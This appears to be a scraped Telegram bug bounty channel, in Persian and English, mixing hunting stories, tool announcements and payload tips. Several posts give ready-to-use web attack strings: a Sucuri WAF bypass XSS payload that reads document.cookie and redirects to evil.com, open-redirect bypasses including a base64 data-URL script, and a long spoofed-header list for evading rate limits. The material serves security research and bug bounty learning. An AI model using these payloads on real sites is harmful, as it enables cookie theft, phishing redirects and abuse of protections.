Bugbounty Tips
2.72K subscribers
80 photos
5 videos
13 files
83 links
research and sharing in cybersecurity
加入频道
9👍6
آسیب پذیری با امتیاز 7.5 در برنامه باگ بانتی:
بعد از Subdomain Enumration از تارگت به صفحه sub.target.com صفحه پیشفرض وب سرور IIS رو پیدا کردم.
دایرکتوری و فایل های حساس رو فاز کردم ولی نتیجه نداشت. بعدش از طریق روشی که سروش دلیلی محقق وب ایرانی کشف کرده بود،
به بررسی وجود آسیب پذیری IIS Short File Name Enumeration رفتم که تونستم وجود این آسیب پذیری رو با این ابزار تایید کنم و یکسری اسم فایل که اسم تقریبی بودن رو پیدا کردم.
ازجمله yechizi.zip که البته این yechizi ناقص بود و با حدس و سعی کردن تونستم اسم فایل رو حدس بزنم و این فایل 10 مگابایتی رو دانلود کنم.
فایل شامل:کردنشیال دیتابیس،اطلاعات پرداختی،کمپین های مالی و سورس کد بود، که با توجه به محدوده پرداختی کمپانی رقم بالا بهش تعلق گرفت.
پس این صفحه رو پیدا کردید این متد فراموش نشه (:

امیدوارم این تجربه براتون مفید بوده باشه.

For more join to channel (:

https://yangx.top/rootdr_research


#Web
#BugBounty
#Link
👍19🔥72
Bugdasht CTB مقام دوم
به ترتیب از راست
مهدی مرادلو
خودم
امیر پیامنی
علیرضا کیا
For more join to channel (:

https://yangx.top/rootdr_research


#Web
#BugBounty
23👍5👏2👌1
XSS.PDF
1.1 MB
Xss Cheatsheet


For more join to channel (:

https://yangx.top/rootdr_research


#Web
#BugBounty
#Book
8🙏1
If you found any #swagger public document on your target, make sure you are testing API endpoints, there's can be some endpoints which accessible without any authentication.



For more join to channel (:

https://yangx.top/rootdr_research


#Web
#BugBounty
👍5🤝31
Bugbounty Tips
If you found any #swagger public document on your target, make sure you are testing API endpoints, there's can be some endpoints which accessible without any authentication. For more join to channel (: https://yangx.top/rootdr_research #Web #BugBounty
این بنده خدا میگه اگه در‌مراحل تست روی تارگتتون فایل دامیومنت swagger api رو دیدین حتما طبق داکیومنت همه اندپوینت هارو چک کنین، ممکنه برای دسترسی به اطلاعات مهم یا عملیات مهم در اندپوینت های api نیاز به احراز هویت نباشه..

For more join to channel (:

https://yangx.top/rootdr_research


#Web
#BugBounty
4👍2
CAPTCHA Bypass Methods



For more join to channel (:

https://yangx.top/rootdr_research

#Web
#Payloads
#BugBounty
👍42🔥2
Use Akamai-Client-Ip instead of XFF to override YOUR IP to 127.0.0.1

For more join to channel (:

https://yangx.top/rootdr_research

#Web
#Payloads
#bugbounty
🔥8
Rate Limit Bypass using HTTP Headers
CACHE_INFO: 127.0.0.1
CF_CONNECTING_IP: 127.0.0.1
CF-Connecting-IP: 127.0.0.1
CLIENT_IP: 127.0.0.1
Client-IP: 127.0.0.1
COMING_FROM: 127.0.0.1
CONNECT_VIA_IP: 127.0.0.1
FORWARD_FOR: 127.0.0.1
FORWARD-FOR: 127.0.0.1
FORWARDED_FOR_IP: 127.0.0.1
FORWARDED_FOR: 127.0.0.1
FORWARDED-FOR-IP: 127.0.0.1
FORWARDED-FOR: 127.0.0.1
FORWARDED: 127.0.0.1
HTTP-CLIENT-IP: 127.0.0.1
HTTP-FORWARDED-FOR-IP: 127.0.0.1
HTTP-PC-REMOTE-ADDR: 127.0.0.1
HTTP-PROXY-CONNECTION: 127.0.0.1
HTTP-VIA: 127.0.0.1
HTTP-X-FORWARDED-FOR-IP: 127.0.0.1
HTTP-X-IMFORWARDS: 127.0.0.1
HTTP-XROXY-CONNECTION: 127.0.0.1
PC_REMOTE_ADDR: 127.0.0.1
PRAGMA: 127.0.0.1
PROXY_AUTHORIZATION: 127.0.0.1
PROXY_CONNECTION: 127.0.0.1
Proxy-Client-IP: 127.0.0.1
PROXY: 127.0.0.1
REMOTE_ADDR: 127.0.0.1
Source-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Via: 127.0.0.1
VIA: 127.0.0.1
WL-Proxy-Client-IP: 127.0.0.1
X_CLUSTER_CLIENT_IP: 127.0.0.1
X_COMING_FROM: 127.0.0.1
X_DELEGATE_REMOTE_HOST: 127.0.0.1
X_FORWARDED_FOR_IP: 127.0.0.1
X_FORWARDED_FOR: 127.0.0.1
X_FORWARDED: 127.0.0.1
X_IMFORWARDS: 127.0.0.1
X_LOCKING: 127.0.0.1
X_LOOKING: 127.0.0.1
X_REAL_IP: 127.0.0.1
X-Backend-Host: 127.0.0.1
X-BlueCoat-Via: 127.0.0.1
X-Cache-Info: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-For: 127.0.0.1, 127.0.0.1, 127.0.0.1
X-Forwarded-Server: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-From-IP: 127.0.0.1
X-From: 127.0.0.1
X-Gateway-Host: 127.0.0.1
X-Host: 127.0.0.1
X-Ip: 127.0.0.1
X-Original-Host: 127.0.0.1
X-Original-IP: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originally-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-ProxyMesh-IP: 127.0.0.1
X-ProxyUser-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-True-Client-IP: 127.0.0.1
XONNECTION: 127.0.0.1
XPROXY: 127.0.0.1
XROXY_CONNECTION: 127.0.0.1
Z-Forwarded-For: 127.0.0.1
ZCACHE_CONTROL: 127.0.0.1


For more join to channel (:

https://yangx.top/rootdr_research

#Web
#Payloads
#bugbounty
7🔥2
this will help you to Bypass csp
http://cspbypass.com/


For more join to channel (:

https://yangx.top/rootdr_research

#Web
#Payloads
#bugbounty
یکی از تیم های ایرانی در حال توسعه یک پلتفرمی هستش که آنلاین این فیچر هارو تست میکنه و خروجی خیلی خوبی میده، این پلتفرم بتا و درحال تغییره و بنظرم پروژه خوبیه حتما ازش استفاده کنید.
Recon
Vulnerability Detection
Github Detective
URL Crawler
همراه با خروجی مناسب
پیشنهاد میشه سر بزنید و نظرتونو بگید زیر همین پست، توی چنل هستن نظراتو میخونن و مطابق با نیاز‌ها مشکل هارو فیکس میکنند و کیفیت رو ارتقا میدند.
https://hackerium.io


For more join to channel (:

https://yangx.top/rootdr_research

#bugbounty
#web
#Pentest
👍133
یک چنل با محتوای بدرد بخور:
https://yangx.top/bugbounty_poc
ویدیو اثبات آسیب پذیری هارو به اشتراک میزاره و بنظرم خیلی میتونه کمک خوبی باشه.

For more join to channel (:

https://yangx.top/rootdr_research

#LINK
#WEB
👍15🔥1
https://github.com/coffinxp/nuclei-templates



how to use in bug bounty programs:
subfinder -d xyz.com -all  | nuclei -t crlf.yaml -rl 50
subfinder -d xyz.com -all  | nuclei -t openRedirect.yaml -rl 100
subfinder -d xyz.com -all  | nuclei -t iis.yaml
subfinder -d xyz.com -all  | nuclei -t cors.yaml -rl 100
subfinder -d xyz.com -all  | waybackurls | gf sqli | uro | nuclei -t errorsqli.yaml -rl 50

For more join to channel (:

https://yangx.top/rootdr_research

#LINK
#WEB
👍5👎1🔥1
Sucuri WAF Bypass:


payload:
<a aa aaa aaaa aaaaaa href=j&#97v&#97script&#x3A;&#97lert(document.cookie)>ClickMe


<a href="j&#97;vascript&#x3A;&#97;lert('Sucuri WAF Bypassed ! ' + document.domain + '\nCookie: ' + document.cookie); window&#46;location&#46;href='https://evil.com';">ClickMe</a>



For more join to channel (:

https://yangx.top/rootdr_research

#LINK
#WEB
👍3👀2
This media is not supported in your browser
VIEW IN TELEGRAM
حل چالش Trickster در PicoCTF
سعی کنید چالش رو حل کنید اول خودتون، خیلی ساده اس.

https://play.picoctf.org/practice/challenge/445



For more join to channel (:

https://yangx.top/rootdr_research
#web
#CTF
#writeup
👍4
ex-param is an automated tool designed for finding reflected parameters for XSS vulnerabilities. It crawls a target website, extracts GET parameters, and tests them for reflected input. The tool helps bug bounty hunters and penetration testers quickly identify potential reflected XSS flaws, offering fast and reliable results.


Features
Crawls a target domain to discover all pages and GET parameters.
Tests each parameter to check if it's reflected in the response.
Outputs a list of reflected parameters for further exploitation.
Fast and optimized for bug bounty hunters.
Easy to use with minimal setup.


link:
https://github.com/rootDR/ex-param




For more join to channel :
https://yangx.top/rootdr_research



#Web
#Bugbounty
#Tools
🔥11👍2👎1👏1
Bugbounty Tips
ex-param is an automated tool designed for finding reflected parameters for XSS vulnerabilities. It crawls a target website, extracts GET parameters, and tests them for reflected input. The tool helps bug bounty hunters and penetration testers quickly identify…
🚀 New Update for Automated Reflected Parameter Finder Tool! 🔍

We've just made the tool even more user-friendly and powerful for penetration testers and security researchers! 🎯

Key Updates:
🏷 New -s Switch: Now you can specify the -s flag to include subdomains in the crawl. If this flag is omitted, the tool will only crawl the main domain — giving you better control over your scans.
🗂 Automatic File Organization: The tool now creates a dedicated folder for each target domain. All crawled pages and discovered parameters are saved neatly in the respective folder.
⚡️ Performance Boost: We've optimized the crawling speed to ensure faster results and a smoother experience while scanning for reflected parameters.
👁 Real-Time Feedback: See results as soon as a reflected parameter is found, reducing wait times and improving user experience.
💻 Check out the updated tool on GitHub and start scanning with even more precision! 🔥

How to Use:
-t (required): The target domain URL to crawl (e.g., https://example.com)
-s: Include subdomains in the crawl. If this flag is omitted, only the main domain is crawled.
🛠 Tools & Features:

Reflected parameter testing for XSS vulnerabilities
Subdomain crawling support
Real-time results & performance improvements
🔧 Try it now and enhance your web security scanning game!

👉 Follow me on Twitter and telegram for more updates: @R00TDR t.me/rootdr_research


#Web
#Bugbounty
#Tools
🔥41👍1
Bugbounty Tips
Photo
🚨 Introducing XSS-Finder: Automated XSS & Reflected Parameter Finder Tool! 🚨

Hey everyone! I'm excited to share a powerful new tool I've developed for penetration testing and web application security enthusiasts – XSS-Finder. 🎯

🔍 What does it do?

Automates the process of detecting XSS vulnerabilities and reflected input parameters on websites.
Crawls domains to gather URLs and identifies GET parameters that are vulnerable to XSS attacks.
Saves the crawled URLs in a text file and checks them for potential XSS vulnerabilities.
Provides a detailed report with the found vulnerabilities to help you secure your web applications.
💻 Features:

🚀 Fast and efficient scanning.
🧑‍💻 Works with both GET parameters and reflected XSS payloads.
🗂 Saves results and crawled URLs for review.
🌐 Supports both public and private domains.
🔧 How to use it?

Clone the repo and run the tool in just a few easy steps!
Supports Python 3.x, and all dependencies are listed in the requirements.txt.
🔗 Get started:

Clone the repository: git clone https://github.com/rootDR/xss-finder.git
Install dependencies: pip install -r requirements.txt
Run the script: python xss-finder.py -t http://example.com
📝 Check it out here: XSS-Finder GitHub Repository

For more join to channel :
https://yangx.top/rootdr_research

#web
#bugbounty
#tools
#pentest
🔥93👍1
🚀 بررسی  بای‌پس‌های بروز برای Open Redirect

اینجا می‌خوام یه سری از بای‌پس‌های جدید و خلاقانه برای باگ Open Redirect رو بهتون بگم که باهاش راحت می‌تونین  بایپس کنین!




🔥 اول از همه، تکنیک Subdomain Overloading

اگه سایت گیر بده که فقط دامنه خودش معتبره، می‌تونین از ساب‌دامین جعلی استفاده کنین:

site.com/login?url=https://site.com.evil.com

اینجا دامنه اصلی رو اول گذاشتیم، اما دامنه مخرب توش مخفی شده و می‌تونین راحت ریدایرکت کنین.




🔥 بازی با TLD و Encoding

اینم یه روش توپ دیگه واسه بای‌پس کردن:

site.com/login?url=https://evil.com/%2E%2E%2E%2F

یا با هشتگ:

site.com/login?url=https://evil.com#site.com

اینجوری سرور فکر می‌کنه که دامنه اصلی معتبره.




🔥 Unicode !

site.com/login?url=https://evil.com%5Csite.com

یا:

site.com/login?url=https://evil.com%EF%BC%8Fsite.com


🔥 Open URL Wrapping

اگه دیدین سایت گیر میده، از لینک‌های واسطه استفاده کنین. مثلا گوگل رو وسط ماجرا بندازین:

site.com/login?url=https://google.com/url?q=https://evil.com

خیلی جاها این جواب میده.




🔥 Data URL Injection

و اما شاهکار پایانی! با استفاده از Data URL می‌تونین مستقیم کد مخرب بندازین تو حلق سایت:

site.com/login?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnU3VwZXIhJyk8L3NjcmlwdD4=

خیلی حرفه‌ای می‌تونین حمله کنین و تاثیرشو نشون بدین.




💡 جمع‌بندی

این بای‌پس‌ها رو تست کنین:

ساب‌دامین جعلی

کدگذاری مثل %2E و %5C

لینک‌های واسطه مثل گوگل

Data URL برای تزریق داده


یادتون نره اگه تکنیک جدیدی پیدا کردین اینجا کامنت کنین تا بقیه هم یاد بگیرن!
🧑‍💻 دنیای باگ بانتی یعنی خلاقیت!

https://yangx.top/rootdr_research

#web
#bugbountt
15👍6👎21🔥1
گاهی اوقات نیازه خارج از چهارچوب فکر و عمل کنید.
آیا همه آسیب پذیری ها فقط بعد فنی دارن؟خیر.
آیا در کشف بعضی آسیب پذیری ها شانس دخیله؟قطعا
شما با تلاشتون تعیین میکنین شانس سمتتون بیاد یا نه.
کشف و اکسپلویت این آسیب پذیری زیر 5 دقیقه برام زمان برد ولی تجربه چند ساله باعث شد زیر 5 دقیقه این مورد پیدا بشه.
فک کنم بهروز (NahamSec) گفته بود، روی تکنولوژی ها و برنامه های ناشناخته زیاد زمان میزاره به چند دلیل
1- باعث میشه تجربش زیاد شه و اونو یاد بگیره
2-اینکه راجب اون تکنولوژی نمیدونه باعث میشه همه چیزو بررسی و تست کنه و یه جورایی خارج از چهارچوب بررسی کنه که منجر به کشف آسیب پذیری های قشنگ و خطرناکی شده براش.
happy hunting.

https://yangx.top/rootdr_research
#web
#bugbounty
👍222
گلدن تیپ هایی که برای پیدا کردن OpenRedirect استفاده میکنم:

1- کشف پارامترهای Open Redirect در مسیرهای بعد از لاگین:
وقتی توی سامانه لاگین کردید، یکی از مسیرهای بعد از لاگین (مثل profile/) رو پیدا کنید.
حالا از سامانه لاگ‌اوت کنید و دوباره اون آدرس رو باز کنید.
اغلب اوقات، سامانه مسیر profile/ رو توی پارامتر redirect خودش می‌ذاره.

2- بررسی پارامترهای Redirect در SSO‌ها:
پارامترهای redirect توی SSO خیلی وقت‌ها آسیب‌پذیرند.
مثلاً این حالت رو چک کنید:
/redirect?=https://validdomain.com.evil.com

3- آدرس‌های بازگشتی از درگاه‌های پرداخت:
بعد از پرداخت، خیلی وقت‌ها سامانه یک درخواست GET به همراه پارامترهای Open Redirect می‌فرسته تا یوزر رو به بخش تراکنش‌ها یا جاهای دیگه هدایت کنه.

4- فانکشن Logout سامانه:
دکمه لاگ‌اوت یا فانکشن مربوط به خروج، معمولاً حاوی پارامتر redirect هست.

البته یادتون نره: اگر سامانه مقدار redirect را بدون encode کردن یا بررسی مستقیم در مکانیزم window.location یا meta refresh استفاده کنه، میتونه به XSS منجر بشه.
اگر:
window.location = getParameter('redirect');
که میشه:
example.com/login?redirect=javascript:alert(origin)


happy hunting.

https://yangx.top/rootdr_research
#web
#bugbounty
👍241